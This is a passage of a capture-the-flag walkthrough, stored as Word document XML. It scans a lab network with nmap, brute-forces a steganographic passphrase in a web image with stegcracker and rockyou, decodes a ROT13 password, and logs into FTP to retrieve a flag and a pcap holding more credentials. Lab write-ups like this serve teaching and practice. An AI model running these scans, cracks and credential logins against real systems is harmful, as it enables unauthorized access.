      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4DC184B4" wp14:editId="7D265F55">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225188</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>719692</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="696036" cy="238836"/>
                <wp:effectExtent l="0" t="0" r="27940" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="33" name="Oval 33"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="696036" cy="23883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B2A0A" id="Oval 33" o:spid="_x0000_s1026" style="position:absolute;margin-left:17.75pt;margin-top:56.65pt;width:54.8pt;height:1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" filled="f" strokecolor="yellow" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CC602E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35E60447" wp14:editId="12DDC48B">
            <wp:extent cx="2733141"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1180" cy="2073005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC50D9" w14:textId="5DD2BBC5" w:rsidR="00CC602E" w:rsidRDefault="00CC602E" w:rsidP="00543BB1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Run Nmap scan to discover and enumerate hosts on network to find the victim machines IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787A4ACE" w14:textId="2674C268" w:rsidR="00CC602E" w:rsidRDefault="00CC602E" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00CC602E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nmap 10.0.2.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E41184C" w14:textId="77777777" w:rsidR="00CC602E" w:rsidRDefault="00CC602E" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The victim IP is 10.0.2.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6852DB15" w14:textId="128EA75C" w:rsidR="00CC602E" w:rsidRDefault="00CC602E" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="016A0FD6" wp14:editId="5C03A2F0">
            <wp:extent cx="4791403" cy="28479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1955" cy="2860191"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6D779F" w14:textId="0AD026D4" w:rsidR="00CC602E" w:rsidRDefault="00CC602E" w:rsidP="00543BB1">
      <w:r>
        <w:t>Port 80 is open with http running. Let’s start there. Open a browser and navigate to the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6E582C" w14:textId="1BA1ECB6" w:rsidR="00CC602E" w:rsidRDefault="00CC602E" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00CC602E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>http://10.0.2.12:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B40CB07" w14:textId="31AF3083" w:rsidR="00CC602E" w:rsidRDefault="00CC602E" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08FC7C54" wp14:editId="44C76D0C">
            <wp:extent cx="3313114" cy="34194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212" cy="3427833"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E4F28C" w14:textId="418F4DEC" w:rsidR="00CC602E" w:rsidRDefault="00CC602E" w:rsidP="00543BB1">
      <w:r>
        <w:t xml:space="preserve">Right click and save the image to your desktop. We will see if hidden code is embedded </w:t>
      </w:r>
      <w:r w:rsidR="002408F7">
        <w:t>here shortly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD137EF" w14:textId="329BDAB9" w:rsidR="00CC1509" w:rsidRDefault="006A4EC8" w:rsidP="00543BB1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00CC1509">
        <w:t>ight-click and view source on the webpage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F615CD" w14:textId="7EDFB304" w:rsidR="00CC1509" w:rsidRDefault="004C772B" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66E39DCE" wp14:editId="2BCCD293">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>122830</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2164023</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1746913" cy="682388"/>
                <wp:effectExtent l="0" t="0" r="24765" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="24" name="Oval 24"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1746913" cy="682388"/>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0039EF" id="Oval 24" o:spid="_x0000_s1026" style="position:absolute;margin-left:9.65pt;margin-top:170.4pt;width:137.55pt;height:5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" filled="f" strokecolor="#0070c0" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CC1509">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1522D73E" wp14:editId="704B7EF6">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3969464" w14:textId="621D6033" w:rsidR="00CC1509" w:rsidRDefault="00CC1509" w:rsidP="00543BB1">
      <w:r>
        <w:t>Notice line 30 contains the plaintext</w:t>
      </w:r>
      <w:r w:rsidR="00641B0C">
        <w:t xml:space="preserve"> string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “matthew” interesting. Let’s move on. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C3B426" w14:textId="77777777" w:rsidR="00CC1509" w:rsidRDefault="00CC1509" w:rsidP="00543BB1"/>
    <w:p w14:paraId="3BC97AC0" w14:textId="509D2AC2" w:rsidR="00CC602E" w:rsidRDefault="00005F58" w:rsidP="00543BB1">
      <w:r>
        <w:t>Run the following command to brute force the contents of the image</w:t>
      </w:r>
      <w:r w:rsidR="00CC1509">
        <w:t xml:space="preserve"> downloaded previously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA46EB9" w14:textId="238E391D" w:rsidR="00005F58" w:rsidRPr="00005F58" w:rsidRDefault="00005F58" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005F58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo apt install stegcracker -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2231D984" w14:textId="371B872A" w:rsidR="00005F58" w:rsidRPr="00005F58" w:rsidRDefault="00005F58" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005F58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;your password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2728ADDB" w14:textId="078F68B4" w:rsidR="00005F58" w:rsidRPr="00005F58" w:rsidRDefault="00005F58" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005F58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>cd /home/kali/Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B07EAF" w14:textId="361D33D8" w:rsidR="00005F58" w:rsidRDefault="00005F58" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00005F58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>stegcracker pic1.jpg /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18168A07" w14:textId="77777777" w:rsidR="00005F58" w:rsidRDefault="00005F58" w:rsidP="00543BB1">
      <w:r>
        <w:t>This returns the password “matthew” in the terminal and writes a file “pic1.jpg.out” to the desktop. Open it to view the contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C1CC4E" w14:textId="33B9E9F6" w:rsidR="00005F58" w:rsidRDefault="00005F58" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D044CBF" wp14:editId="43EAE881">
            <wp:extent cx="6150221" cy="1981081"/>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373" cy="1991438"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E515DC7" w14:textId="387E34E9" w:rsidR="00005F58" w:rsidRDefault="00005F58" w:rsidP="00543BB1">
      <w:r>
        <w:t>Alternatively, you could take the known password and use it with the following commands</w:t>
      </w:r>
      <w:r w:rsidR="00CC1509">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFAA4E2" w14:textId="7286621B" w:rsidR="00005F58" w:rsidRPr="00005F58" w:rsidRDefault="00005F58" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005F58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sudo apt install steghide -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286E8B43" w14:textId="2601FC20" w:rsidR="00005F58" w:rsidRPr="00005F58" w:rsidRDefault="00005F58" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005F58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;your password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35321691" w14:textId="6420651B" w:rsidR="00005F58" w:rsidRPr="00005F58" w:rsidRDefault="00005F58" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005F58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>steghide extract -sf pic1.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D3B871" w14:textId="2BC514CC" w:rsidR="00005F58" w:rsidRDefault="00005F58" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00005F58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>matthew</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258B7E4B" w14:textId="680CBA4D" w:rsidR="00CC1509" w:rsidRDefault="00005F58" w:rsidP="00543BB1">
      <w:r>
        <w:t>This will output “thoughts.txt” to the desktop. This file contains the same info as “pic1.jpg.out”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B540E9D" w14:textId="4C6BD0DC" w:rsidR="00CC1509" w:rsidRDefault="00CC1509" w:rsidP="00543BB1">
      <w:r>
        <w:t>Look inside the file and notice the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCF6481" w14:textId="64F2BCD4" w:rsidR="00005F58" w:rsidRDefault="004C772B" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F42FEC9" wp14:editId="7B27C158">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3657600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>845090</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1323833" cy="402609"/>
                <wp:effectExtent l="0" t="0" r="10160" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="28" name="Oval 28"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1323833" cy="402609"/>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3E1FFB" id="Oval 28" o:spid="_x0000_s1026" style="position:absolute;margin-left:4in;margin-top:66.55pt;width:104.25pt;height:3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" filled="f" strokecolor="yellow"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6039F9B" wp14:editId="318D16F1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2047164</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>845090</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="573206" cy="354425"/>
                <wp:effectExtent l="0" t="0" r="17780" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="26" name="Oval 26"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="573206" cy="3544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993C6" id="Oval 26" o:spid="_x0000_s1026" style="position:absolute;margin-left:161.2pt;margin-top:66.55pt;width:45.15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" filled="f" strokecolor="yellow"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71CA6BF3" wp14:editId="600B0957">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>170351</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>114471</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="307075" cy="1084997"/>
                <wp:effectExtent l="0" t="0" r="17145" b="20320"/>
                <wp:wrapNone/>
                <wp:docPr id="25" name="Oval 25"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="307075" cy="1084997"/>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5EA34" id="Oval 25" o:spid="_x0000_s1026" style="position:absolute;margin-left:13.4pt;margin-top:9pt;width:24.2pt;height:8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" filled="f" strokecolor="yellow" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CC1509" w:rsidRPr="00CC1509">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="100F0912" wp14:editId="2BDBA240">
            <wp:extent cx="905001" cy="1428949"/>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905001" cy="1428949"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00CC1509">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="00CC1509">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F1F68B5" wp14:editId="627E25EA">
            <wp:extent cx="4620260" cy="6667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0260" cy="666750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12221AF8" w14:textId="39CFF487" w:rsidR="00CC1509" w:rsidRDefault="00CC1509" w:rsidP="00543BB1">
      <w:r>
        <w:t xml:space="preserve">Hidden username “MATT” and an encoded password with what we can assume is encoded with ROT13. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3948EF89" w14:textId="00AEC9C4" w:rsidR="00CC1509" w:rsidRDefault="00CC1509" w:rsidP="00543BB1">
      <w:r>
        <w:t xml:space="preserve">Use a decoder of your choice to decode the cypher. </w:t>
      </w:r>
      <w:r w:rsidR="008A4306">
        <w:t xml:space="preserve">I chose rot13.com. CyberChef would be a great </w:t>
      </w:r>
      <w:r w:rsidR="00A75B5E">
        <w:t>alternative,</w:t>
      </w:r>
      <w:r w:rsidR="008A4306">
        <w:t xml:space="preserve"> or any multi-decoder should work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC612EC" w14:textId="3E1A3A4E" w:rsidR="00CC1509" w:rsidRDefault="00CC1509" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E821165" wp14:editId="32F51392">
            <wp:extent cx="3508641"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473" cy="3491945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B8C85" w14:textId="0F016375" w:rsidR="00CC1509" w:rsidRDefault="00CC1509" w:rsidP="00543BB1">
      <w:r>
        <w:t>The output should be “cybersecrocks”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43514710" w14:textId="56259539" w:rsidR="00CC1509" w:rsidRDefault="00CC1509" w:rsidP="00543BB1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In the previously decoded </w:t>
      </w:r>
      <w:r w:rsidR="008A4306">
        <w:t xml:space="preserve">thoughts.txt </w:t>
      </w:r>
      <w:r>
        <w:t>file, it mentions a personal file service and we know that ftp is running. Let’s use these credentials against the ftp server</w:t>
      </w:r>
      <w:r w:rsidR="008A4306">
        <w:t xml:space="preserve"> and attempt a login. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADA8731" w14:textId="547ACCF3" w:rsidR="008A4306" w:rsidRPr="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4306">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ftp 10.0.2.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668B36DF" w14:textId="56D798BE" w:rsidR="008A4306" w:rsidRPr="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4306">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>matt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B8ED6" w14:textId="4206CB3B" w:rsidR="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:r w:rsidRPr="008A4306">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>cybersecrocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC382A2" w14:textId="5C03E6E7" w:rsidR="00CC1509" w:rsidRPr="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4306">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBE090E" w14:textId="06CAB70E" w:rsidR="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:r w:rsidRPr="008A4306">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>get ftpflag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDC45A0" w14:textId="77777777" w:rsidR="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:r>
        <w:t xml:space="preserve">This will download the file to your current working directory. Navigate to the file and open it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5CF335" w14:textId="483462DA" w:rsidR="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DC24151" wp14:editId="1B970DBD">
            <wp:extent cx="5934075" cy="209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1CC12E19" w14:textId="3B248DBF" w:rsidR="008A4306" w:rsidRPr="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00641B0C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP </w:t>
      </w:r>
      <w:r w:rsidRPr="00E847C9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:t>FLA</w:t>
      </w:r>
      <w:r w:rsidR="00641B0C" w:rsidRPr="00E847C9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:t>G C</w:t>
      </w:r>
      <w:r w:rsidR="00E847C9" w:rsidRPr="00E847C9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:t>APTURED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF772D7" w14:textId="2DA1027B" w:rsidR="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:r>
        <w:t xml:space="preserve">Included are instructions to download the pcap file. Let’s do so. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B2ABA" w14:textId="37F9370D" w:rsidR="008A4306" w:rsidRPr="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4306">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C270B9" w14:textId="1B598DC1" w:rsidR="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:r w:rsidRPr="008A4306">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>get sensitiveinfo.pcap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769D7178" w14:textId="07B9C2CB" w:rsidR="008A4306" w:rsidRPr="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4306">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C72AAFA" w14:textId="63AFEBCD" w:rsidR="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:r w:rsidRPr="008A4306">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF60AC9" w14:textId="3CCEDCA6" w:rsidR="008A4306" w:rsidRDefault="008A4306" w:rsidP="00543BB1">
      <w:r>
        <w:t>Open Wireshark and load the “sensitiveinfo.pcap” file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB296F" w14:textId="00C16C7E" w:rsidR="00641B0C" w:rsidRDefault="00641B0C" w:rsidP="00543BB1">
      <w:r>
        <w:t>Right c</w:t>
      </w:r>
      <w:r w:rsidR="008A4306">
        <w:t xml:space="preserve">lick on the </w:t>
      </w:r>
      <w:r>
        <w:t>frame (No</w:t>
      </w:r>
      <w:r w:rsidR="00D0043A">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4) where you notice a connection </w:t>
      </w:r>
      <w:r w:rsidR="00D0043A">
        <w:t>start,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and select </w:t>
      </w:r>
      <w:r w:rsidRPr="00D0043A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Follow </w:t>
      </w:r>
      <w:r w:rsidRPr="00D0043A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00D0043A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP stream</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or just use: CTRL+SHIFT+ALT+T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407BE4DA" w14:textId="6B22A024" w:rsidR="00641B0C" w:rsidRDefault="00641B0C" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13818A8D" wp14:editId="7BA45A21">
            <wp:extent cx="59436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61C0CEEA" w14:textId="3322F1BA" w:rsidR="008A4306" w:rsidRDefault="00641B0C" w:rsidP="00543BB1">
      <w:r>
        <w:t xml:space="preserve">WOAH! Some juicy details here. We now have credentials for a user account and a potential attack vector. Let’s save this information for later and continue checking out the pcap file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA0376C" w14:textId="090BBF07" w:rsidR="00641B0C" w:rsidRDefault="00641B0C" w:rsidP="00543BB1">
      <w:r>
        <w:t>Follow the next 2 tcp streams in the file for a total of 3 tcp streams. The 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00641B0C">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
